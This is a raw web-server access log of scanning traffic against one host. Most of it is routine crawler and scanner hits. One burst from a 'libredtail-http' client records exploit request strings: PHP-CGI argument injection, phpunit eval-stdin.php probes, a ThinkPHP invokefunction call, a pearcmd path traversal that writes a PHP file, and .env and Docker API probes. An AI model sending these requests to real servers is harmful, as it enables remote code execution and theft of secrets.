[Gzip 3.21] "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.159 Safari/537.36" "-" -[15/Feb/2026:21:38:11 +0000] 404 - GET http 222.117.41.51 "/auth1.html" [Client 64.227.19.194] [Length 183] [Gzip 3.21] "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.159 Safari/537.36" "-" -[15/Feb/2026:21:38:12 +0000] 404 - GET http 222.117.41.51 "/sslvpnLogin.html" [Client 64.227.19.194] [Length 183] [Gzip 3.21] "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.159 Safari/537.36" "-" -[15/Feb/2026:21:38:12 +0000] 404 - GET http 222.117.41.51 "/api/sonicos/auth" [Client 64.227.19.194] [Length 183] [Gzip 3.21] "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.159 Safari/537.36" "-" -[15/Feb/2026:21:38:12 +0000] 404 - GET http 222.117.41.51 "/api/sonicos/tfa" [Client 64.227.19.194] [Length 183] [Gzip 3.21] "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.159 Safari/537.36" "-" -[15/Feb/2026:21:38:28 +0000] 200 - GET http 222.117.41.51 "/" [Client 50.116.9.129] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.61 Safari/537.36" "-" -[15/Feb/2026:21:38:28 +0000] 400 - GET http 222.117.41.51 "/favicon.ico" [Client 127.0.0.1] [Length 230] [Gzip -] "-" "-" -[15/Feb/2026:21:41:34 +0000] 200 - GET http 222.117.41.51 "/" [Client 204.76.203.212] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" -[15/Feb/2026:21:43:07 +0000] 200 - GET http 222.117.41.51 "/" [Client 45.194.92.25] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" -[15/Feb/2026:21:44:55 +0000] 200 - GET http 222.117.41.51 "/" [Client 50.116.9.129] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.61 Safari/537.36" "-" -[15/Feb/2026:21:53:08 +0000] 200 - GET http 222.117.41.51 "/" [Client 204.76.203.219] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" -[15/Feb/2026:21:54:31 +0000] 200 - GET http 222.117.41.51 "/" [Client 176.65.139.8] [Length 1033] [Gzip -] "-" "-" -[15/Feb/2026:21:57:28 +0000] 404 - GET http 222.117.41.51 "/.env" [Client 34.158.168.101] [Length 150] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Firefox/121.0" "-" -[15/Feb/2026:21:57:28 +0000] 400 - GET http 222.117.41.51 "/.env" [Client 34.158.168.101] [Length 654] [Gzip -] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 Chrome/120.0.0.0" "-" -[15/Feb/2026:21:57:28 +0000] 400 - - http localhost-nginx-proxy-manager "-" [Client 34.158.168.101] [Length 154] [Gzip -] "-" "-" -[15/Feb/2026:21:57:29 +0000] 400 - GET http 222.117.41.51 "/" [Client 34.158.168.101] [Length 252] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Firefox/121.0" "-" -[15/Feb/2026:21:57:29 +0000] 400 - - http localhost-nginx-proxy-manager "-" [Client 34.158.168.101] [Length 154] [Gzip -] "-" "-" -[15/Feb/2026:22:00:24 +0000] 200 - GET http 222.117.41.51 "/" [Client 45.153.34.187] [Length 1033] [Gzip -] "Mozilla/5.0" "-" -[15/Feb/2026:22:00:42 +0000] 200 - GET http localhost-nginx-proxy-manager "/" [Client 104.248.187.213] [Length 1033] [Gzip -] "-" "-" -[15/Feb/2026:22:01:21 +0000] 200 - GET http localhost-nginx-proxy-manager "/" [Client 172.105.158.232] [Length 1033] [Gzip -] "-" "-" -[15/Feb/2026:22:01:22 +0000] 400 - - http localhost-nginx-proxy-manager "-" [Client 172.105.158.232] [Length 154] [Gzip -] "-" "-" -[15/Feb/2026:22:01:22 +0000] 400 - - http localhost-nginx-proxy-manager "-" [Client 172.105.158.232] [Length 154] [Gzip -] "-" "-" -[15/Feb/2026:22:01:23 +0000] 400 - - http localhost-nginx-proxy-manager "-" [Client 172.105.158.232] [Length 154] [Gzip -] "-" "-" -[15/Feb/2026:22:01:23 +0000] 400 - - http localhost-nginx-proxy-manager "-" [Client 172.105.158.232] [Length 154] [Gzip -] "-" "-" -[15/Feb/2026:22:01:23 +0000] 400 - - http localhost-nginx-proxy-manager "-" [Client 172.105.158.232] [Length 154] [Gzip -] "-" "-" -[15/Feb/2026:22:01:24 +0000] 400 - - http localhost-nginx-proxy-manager "-" [Client 172.105.158.232] [Length 154] [Gzip -] "-" "-" -[15/Feb/2026:22:01:24 +0000] 400 - - http localhost-nginx-proxy-manager "-" [Client 172.105.158.232] [Length 154] [Gzip -] "-" "-" -[15/Feb/2026:22:01:25 +0000] 400 - - http localhost-nginx-proxy-manager "-" [Client 172.105.158.232] [Length 154] [Gzip -] "-" "-" -[15/Feb/2026:22:01:25 +0000] 400 - - http localhost-nginx-proxy-manager "-" [Client 172.105.158.232] [Length 154] [Gzip -] "-" "-" -[15/Feb/2026:22:01:25 +0000] 400 - - http localhost-nginx-proxy-manager "-" [Client 172.105.158.232] [Length 154] [Gzip -] "-" "-" -[15/Feb/2026:22:01:26 +0000] 400 - - http localhost-nginx-proxy-manager "-" [Client 172.105.158.232] [Length 154] [Gzip -] "-" "-" -[15/Feb/2026:22:01:26 +0000] 400 - - http localhost-nginx-proxy-manager "-" [Client 172.105.158.232] [Length 154] [Gzip -] "-" "-" -[15/Feb/2026:22:05:55 +0000] 200 - GET http 222.117.41.51 "/" [Client 43.153.7.191] [Length 568] [Gzip 1.86] "Mozilla/5.0 (iPhone; CPU iPhone OS 13_2_3 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/13.0.3 Mobile/15E148 Safari/604.1" "-" -[15/Feb/2026:22:07:58 +0000] 200 - GET http 222.117.41.51 "/" [Client 109.105.210.95] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36" "-" -[15/Feb/2026:22:09:42 +0000] 200 - GET http 222.117.41.51 "/" [Client 204.76.203.212] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" -[15/Feb/2026:22:26:19 +0000] 400 - POST http localhost-nginx-proxy-manager "-" [Client 160.187.165.218] [Length 154] [Gzip -] "-" "-" -[15/Feb/2026:22:26:23 +0000] 400 - POST http localhost-nginx-proxy-manager "-" [Client 160.187.165.218] [Length 154] [Gzip -] "-" "-" -[15/Feb/2026:22:26:31 +0000] 404 - POST http 222.117.41.51 "/hello.world?%ADd+allow_url_include%3d1+%ADd+auto_prepend_file%3dphp://input" [Client 160.187.165.218] [Length 150] [Gzip -] "libredtail-http" "-" -[15/Feb/2026:22:26:32 +0000] 405 - POST http 222.117.41.51 "/?%ADd+allow_url_include%3d1+%ADd+auto_prepend_file%3dphp://input" [Client 160.187.165.218] [Length 154] [Gzip -] "libredtail-http" "-" -[15/Feb/2026:22:26:32 +0000] 404 - GET http 222.117.41.51 "/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" [Client 160.187.165.218] [Length 150] [Gzip -] "libredtail-http" "-" -[15/Feb/2026:22:26:32 +0000] 404 - GET http 222.117.41.51 "/vendor/phpunit/phpunit/Util/PHP/eval-stdin.php" [Client 160.187.165.218] [Length 150] [Gzip -] "libredtail-http" "-" -[15/Feb/2026:22:26:32 +0000] 404 - GET http 222.117.41.51 "/vendor/phpunit/src/Util/PHP/eval-stdin.php" [Client 160.187.165.218] [Length 150] [Gzip -] "libredtail-http" "-" -[15/Feb/2026:22:26:32 +0000] 404 - GET http 222.117.41.51 "/vendor/phpunit/Util/PHP/eval-stdin.php" [Client 160.187.165.218] [Length 150] [Gzip -] "libredtail-http" "-" -[15/Feb/2026:22:26:33 +0000] 404 - GET http 222.117.41.51 "/vendor/phpunit/phpunit/LICENSE/eval-stdin.php" [Client 160.187.165.218] [Length 150] [Gzip -] "libredtail-http" "-" -[15/Feb/2026:22:26:33 +0000] 404 - GET http 222.117.41.51 "/vendor/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" [Client 160.187.165.218] [Length 150] [Gzip -] "libredtail-http" "-" -[15/Feb/2026:22:26:33 +0000] 404 - GET http 222.117.41.51 "/phpunit/phpunit/src/Util/PHP/eval-stdin.php" [Client 160.187.165.218] [Length 150] [Gzip -] "libredtail-http" "-" -[15/Feb/2026:22:26:33 +0000] 404 - GET http 222.117.41.51 "/phpunit/phpunit/Util/PHP/eval-stdin.php" [Client 160.187.165.218] [Length 150] [Gzip -] "libredtail-http" "-" -[15/Feb/2026:22:26:34 +0000] 404 - GET http 222.117.41.51 "/phpunit/src/Util/PHP/eval-stdin.php" [Client 160.187.165.218] [Length 150] [Gzip -] "libredtail-http" "-" -[15/Feb/2026:22:26:34 +0000] 404 - GET http 222.117.41.51 "/phpunit/Util/PHP/eval-stdin.php" [Client 160.187.165.218] [Length 150] [Gzip -] "libredtail-http" "-" -[15/Feb/2026:22:26:34 +0000] 404 - GET http 222.117.41.51 "/lib/phpunit/phpunit/src/Util/PHP/eval-stdin.php" [Client 160.187.165.218] [Length 150] [Gzip -] "libredtail-http" "-" -[15/Feb/2026:22:26:34 +0000] 404 - GET http 222.117.41.51 "/lib/phpunit/phpunit/Util/PHP/eval-stdin.php" [Client 160.187.165.218] [Length 150] [Gzip -] "libredtail-http" "-" -[15/Feb/2026:22:26:34 +0000] 404 - GET http 222.117.41.51 "/lib/phpunit/src/Util/PHP/eval-stdin.php" [Client 160.187.165.218] [Length 150] [Gzip -] "libredtail-http" "-" -[15/Feb/2026:22:26:35 +0000] 404 - GET http 222.117.41.51 "/lib/phpunit/Util/PHP/eval-stdin.php" [Client 160.187.165.218] [Length 150] [Gzip -] "libredtail-http" "-" -[15/Feb/2026:22:26:35 +0000] 404 - GET http 222.117.41.51 "/lib/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" [Client 160.187.165.218] [Length 150] [Gzip -] "libredtail-http" "-" -[15/Feb/2026:22:26:35 +0000] 404 - GET http 222.117.41.51 "/laravel/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" [Client 160.187.165.218] [Length 150] [Gzip -] "libredtail-http" "-" -[15/Feb/2026:22:26:35 +0000] 404 - GET http 222.117.41.51 "/www/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" [Client 160.187.165.218] [Length 150] [Gzip -] "libredtail-http" "-" -[15/Feb/2026:22:26:36 +0000] 404 - GET http 222.117.41.51 "/ws/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" [Client 160.187.165.218] [Length 150] [Gzip -] "libredtail-http" "-" -[15/Feb/2026:22:26:36 +0000] 404 - GET http 222.117.41.51 "/yii/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" [Client 160.187.165.218] [Length 150] [Gzip -] "libredtail-http" "-" -[15/Feb/2026:22:26:36 +0000] 404 - GET http 222.117.41.51 "/zend/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" [Client 160.187.165.218] [Length 150] [Gzip -] "libredtail-http" "-" -[15/Feb/2026:22:26:36 +0000] 404 - GET http 222.117.41.51 "/ws/ec/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" [Client 160.187.165.218] [Length 150] [Gzip -] "libredtail-http" "-" -[15/Feb/2026:22:26:36 +0000] 404 - GET http 222.117.41.51 "/V2/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" [Client 160.187.165.218] [Length 150] [Gzip -] "libredtail-http" "-" -[15/Feb/2026:22:26:37 +0000] 404 - GET http 222.117.41.51 "/tests/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" [Client 160.187.165.218] [Length 150] [Gzip -] "libredtail-http" "-" -[15/Feb/2026:22:26:37 +0000] 404 - GET http 222.117.41.51 "/test/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" [Client 160.187.165.218] [Length 150] [Gzip -] "libredtail-http" "-" -[15/Feb/2026:22:26:37 +0000] 404 - GET http 222.117.41.51 "/testing/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" [Client 160.187.165.218] [Length 150] [Gzip -] "libredtail-http" "-" -[15/Feb/2026:22:26:37 +0000] 404 - GET http 222.117.41.51 "/api/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" [Client 160.187.165.218] [Length 150] [Gzip -] "libredtail-http" "-" -[15/Feb/2026:22:26:38 +0000] 404 - GET http 222.117.41.51 "/demo/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" [Client 160.187.165.218] [Length 150] [Gzip -] "libredtail-http" "-" -[15/Feb/2026:22:26:38 +0000] 404 - GET http 222.117.41.51 "/cms/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" [Client 160.187.165.218] [Length 150] [Gzip -] "libredtail-http" "-" -[15/Feb/2026:22:26:38 +0000] 404 - GET http 222.117.41.51 "/crm/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" [Client 160.187.165.218] [Length 150] [Gzip -] "libredtail-http" "-" -[15/Feb/2026:22:26:38 +0000] 404 - GET http 222.117.41.51 "/admin/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" [Client 160.187.165.218] [Length 150] [Gzip -] "libredtail-http" "-" -[15/Feb/2026:22:26:38 +0000] 404 - GET http 222.117.41.51 "/backup/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" [Client 160.187.165.218] [Length 150] [Gzip -] "libredtail-http" "-" -[15/Feb/2026:22:26:39 +0000] 404 - GET http 222.117.41.51 "/blog/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" [Client 160.187.165.218] [Length 150] [Gzip -] "libredtail-http" "-" -[15/Feb/2026:22:26:39 +0000] 404 - GET http 222.117.41.51 "/workspace/drupal/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" [Client 160.187.165.218] [Length 150] [Gzip -] "libredtail-http" "-" -[15/Feb/2026:22:26:39 +0000] 404 - GET http 222.117.41.51 "/panel/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" [Client 160.187.165.218] [Length 150] [Gzip -] "libredtail-http" "-" -[15/Feb/2026:22:26:39 +0000] 404 - GET http 222.117.41.51 "/public/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" [Client 160.187.165.218] [Length 150] [Gzip -] "libredtail-http" "-" -[15/Feb/2026:22:26:40 +0000] 404 - GET http 222.117.41.51 "/apps/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" [Client 160.187.165.218] [Length 150] [Gzip -] "libredtail-http" "-" -[15/Feb/2026:22:26:40 +0000] 404 - GET http 222.117.41.51 "/app/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" [Client 160.187.165.218] [Length 150] [Gzip -] "libredtail-http" "-" -[15/Feb/2026:22:26:40 +0000] 404 - GET http 222.117.41.51 "/index.php?s=/index/\x5Cthink\x5Capp/invokefunction&function=call_user_func_array&vars[0]=md5&vars[1][]=Hello" [Client 160.187.165.218] [Length 150] [Gzip -] "libredtail-http" "-" -[15/Feb/2026:22:26:40 +0000] 404 - GET http 222.117.41.51 "/public/index.php?s=/index/\x5Cthink\x5Capp/invokefunction&function=call_user_func_array&vars[0]=md5&vars[1][]=Hello" [Client 160.187.165.218] [Length 150] [Gzip -] "libredtail-http" "-" -[15/Feb/2026:22:26:41 +0000] 403 - GET http 222.117.41.51 "/index.php?lang=../../../../../../../../usr/local/lib/php/pearcmd&+config-create+/&/+/tmp/index1.php" [Client 160.187.165.218] [Length 150] [Gzip -] "libredtail-http" "-" -[15/Feb/2026:22:26:41 +0000] 403 - GET http 222.117.41.51 "/index.php?lang=../../../../../../../../tmp/index1" [Client 160.187.165.218] [Length 150] [Gzip -] "libredtail-http" "-" -[15/Feb/2026:22:26:41 +0000] 404 - GET http 222.117.41.51 "/containers/json" [Client 160.187.165.218] [Length 150] [Gzip -] "libredtail-http" "-" -[15/Feb/2026:22:27:50 +0000] 200 - GET http 222.117.41.51 "/" [Client 89.42.231.200] [Length 1033] [Gzip -] "-" "-" -[15/Feb/2026:22:32:08 +0000] 200 - GET http 222.117.41.51 "/" [Client 204.76.203.212] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" -[15/Feb/2026:22:36:42 +0000] 200 - GET http 222.117.41.51 "/" [Client 45.153.34.187] [Length 1033] [Gzip -] "Mozilla/5.0" "-" -[15/Feb/2026:22:36:54 +0000] 200 - GET http 222.117.41.51 "/" [Client 45.194.92.25] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" -[15/Feb/2026:22:49:27 +0000] 200 - GET http 222.117.41.51 "/" [Client 204.76.203.219] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" -[15/Feb/2026:22:52:44 +0000] 400 - - http localhost-nginx-proxy-manager "-" [Client 45.91.64.6] [Length 154] [Gzip -] "-" "-" -[15/Feb/2026:22:52:59 +0000] 400 - GET http localhost "/" [Client 45.91.64.6] [Length 654] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.0.0 Safari/537.36" "-" -[15/Feb/2026:23:00:16 +0000] 200 - GET http 222.117.41.51 "/" [Client 204.76.203.212] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" -[15/Feb/2026:23:09:14 +0000] 404 - GET http 222.117.41.51 "/.env" [Client 34.158.168.101] [Length 150] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Firefox/121.0" "-" -[15/Feb/2026:23:09:15 +0000] 400 - GET http 222.117.41.51 "/.env" [Client 34.158.168.101] [Length 654] [Gzip -] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 Chrome/120.0.0.0" "-" -[15/Feb/2026:23:09:16 +0000] 400 - - http localhost-nginx-proxy-manager "-" [Client 34.158.168.101] [Length 154] [Gzip -] "-" "-" -[15/Feb/2026:23:09:16 +0000] 400 - GET http 222.117.41.51 "/" [Client 34.158.168.101] [Length 252] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Firefox/121.0" "-" -[15/Feb/2026:23:09:18 +0000] 400 - - http localhost-nginx-proxy-manager "-" [Client 34.158.168.101] [Length 154] [Gzip -] "-" "-" -[15/Feb/2026:23:18:49 +0000] 200 - GET http localhost-nginx-proxy-manager "/" [Client 205.210.31.222] [Length 1033] [Gzip -] "Hello from Palo Alto Networks, find out more about our scans in https://docs-cortex.paloaltonetworks.com/r/1/Cortex-Xpanse/Scanning-activity" "-" -[15/Feb/2026:23:23:24 +0000] 200 - GET http 222.117.41.51 "/" [Client 204.76.203.212] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" -[15/Feb/2026:23:29:44 +0000] 200 - GET http 222.117.41.51 "/" [Client 45.194.92.25] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" -[15/Feb/2026:23:47:08 +0000] 200 - GET http 222.117.41.51 "/" [Client 204.76.203.219] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" -[15/Feb/2026:23:49:50 +0000] 200 - GET http 222.117.41.51 "/" [Client 204.76.203.212] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" -[16/Feb/2026:00:02:23 +0000] 200 - GET http 222.117.41.51 "/" [Client 45.153.34.187] [Length 1033] [Gzip -] "Mozilla/5.0" "-" -[16/Feb/2026:00:13:15 +0000] 400 - GET http 222.117.41.51 "/" [Client 176.65.139.8] [Length 252] [Gzip -] "-" "-" -[16/Feb/2026:00:15:13 +0000] 200 - GET http 222.117.41.51 "/" [Client 204.76.203.212] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" -[16/Feb/2026:00:26:38 +0000] 200 - GET http 222.117.41.51 "/" [Client 89.42.231.200] [Length 1033] [Gzip -] "-" "-" -[16/Feb/2026:00:30:39 +0000] 200 - GET http 222.117.41.51 "/" [Client 45.194.92.25] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" -[16/Feb/2026:00:42:24 +0000] 200 - GET http 222.117.41.51 "/" [Client 204.76.203.212] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" -[16/Feb/2026:00:44:22 +0000] 200 - GET http 222.117.41.51 "/" [Client 204.76.203.219] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" -[16/Feb/2026:01:05:27 +0000] 200 - GET http 222.117.41.51 "/" [Client 204.76.203.212] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" -[16/Feb/2026:01:24:12 +0000] 200 - GET http 222.117.41.51 "/" [Client 45.194.92.25] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" -[16/Feb/2026:01:30:39 +0000] 200 - GET http 222.117.41.51 "/" [Client 204.76.203.212] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" -[16/Feb/2026:01:35:59 +0000] 200 - GET http 222.117.41.51 "/" [Client 206.168.34.57] [Length 568] [Gzip 1.86] "Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)" "-" -[16/Feb/2026:01:36:02 +0000] 400 - - http localhost-nginx-proxy-manager "-" [Client 206.168.34.57] [Length 154] [Gzip -] "-" "-" -[16/Feb/2026:01:36:05 +0000] 400 - - http localhost-nginx-proxy-manager "-" [Client 206.168.34.57] [Length 154] [Gzip -] "-" "-" -[16/Feb/2026:01:36:06 +0000] 400 - GET http 222.117.41.51 "/favicon.ico" [Client 127.0.0.1] [Length 230] [Gzip -] "-" "-" -[16/Feb/2026:01:36:21 +0000] 404 - GET http 222.117.41.51 "/.well-known/security.txt" [Client 206.168.34.57] [Length 122] [Gzip 1.35] "Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)" "-" -[16/Feb/2026:01:36:23 +0000] 400 - - http localhost-nginx-proxy-manager "-" [Client 206.168.34.57] [Length 154] [Gzip -] "-" "-" -[16/Feb/2026:01:39:34 +0000] 200 - GET http 222.117.41.51 "/" [Client 204.76.203.219] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" -[16/Feb/2026:01:59:18 +0000] 200 - GET http 222.117.41.51 "/" [Client 204.76.203.212] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" -[16/Feb/2026:02:20:52 +0000] 200 - GET http 222.117.41.51 "/" [Client 45.194.92.25] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" -[16/Feb/2026:02:23:29 +0000] 200 - GET http 222.117.41.51 "/" [Client 204.76.203.212] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" -[16/Feb/2026:02:28:05 +0000] 200 - GET http 222.117.41.51 "/" [Client 45.153.34.187] [Length 1033] [Gzip -] "Mozilla/5.0" "-" -[16/Feb/2026:02:34:31 +0000] 200 - GET http 222.117.41.51 "/" [Client 204.76.203.219] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" -[16/Feb/2026:02:46:29 +0000] 400 - - http localhost "-" [Client 176.65.148.19] [Length 154] [Gzip -] "-" "-" -[16/Feb/2026:02:47:52 +0000] 200 - GET http 222.117.41.51 "/" [Client 204.76.203.212] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" -[16/Feb/2026:02:54:17 +0000] 200 - GET http 222.117.41.51 "/" [Client 89.42.231.200] [Length 1033] [Gzip -] "-" "-" -[16/Feb/2026:03:00:29 +0000] 200 - GET http 222.117.41.51 "/" [Client 115.231.78.11] [Length 1033] [Gzip -] "Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/71.0.2623.112 Safari/537.36" "-" -[16/Feb/2026:03:00:29 +0000] 200 - GET http 222.117.41.51 "/" [Client 115.231.78.11] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/63.0.3239.132 Safari/537.36 QIHU 360SE" "-" -[16/Feb/2026:03:00:29 +0000] 400 - GET http 222.117.41.51 "/favicon.ico" [Client 127.0.0.1] [Length 230] [Gzip -] "-" "-" -[16/Feb/2026:03:00:30 +0000] 404 - GET http 222.117.41.51 "/robots.txt" [Client 115.231.78.11] [Length 183] [Gzip 3.21] "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/63.0.3239.132 Safari/537.36 QIHU 360SE" "-" -[16/Feb/2026:03:02:58 +0000] 200 - GET http 222.117.41.51 "/" [Client 157.245.103.95] [Length 568] [Gzip 1.86] "Mozilla/5.0 (compatible; IPScanner/1.0)" "-" -[16/Feb/2026:03:13:02 +0000] 200 - GET http 222.117.41.51 "/" [Client 204.76.203.212] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" -[16/Feb/2026:03:14:18 +0000] 200 - GET http 222.117.41.51 "/" [Client 45.194.92.25] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" -[16/Feb/2026:03:27:47 +0000] 200 - GET http 222.117.41.51 "/" [Client 45.153.34.187] [Length 1033] [Gzip -] "Mozilla/5.0" "-" -[16/Feb/2026:03:32:39 +0000] 200 